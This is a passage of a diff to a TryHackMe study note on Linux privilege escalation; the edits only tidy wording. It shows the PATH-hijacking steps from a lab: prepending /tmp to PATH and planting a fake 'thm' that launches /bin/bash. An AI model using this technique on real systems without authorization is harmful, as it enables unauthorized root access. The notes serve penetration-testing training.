clydebuilt1974/TryHackMe/Junior Penetration Tester/Privilege Escalation/Linux Privilege Escalation.md

 except:
 	sys.exit()
 ```
-* "test" file appears to be a compiled version of `thm.py' script.
+* "test" file appears to be compiled version of `thm.py` script.
 ```
 ./test
 sh: 1: thm: not found
 ```
-* No path defined for this script.
+* No path defined for script.
-* Machine will look in the PATH environment to find the executable and will execute the first one it finds.
+* Linux will look in the PATH environment to find the executable and will execute the first one it finds.
-* Add the `/tmp` directory into the beginning of the PATH environment.
+* Add `/tmp` directory into the beginning of the PATH environment.
 ```
 export PATH=/tmp:$PATH
 ```
-* Copy `/bin/bash` as “thm” under the `/tmp` folder.
+* Copy `/bin/bash` as "thm" under the `/tmp` folder.
 ```
 cd /tmp
 echo "/bin/bash" > thm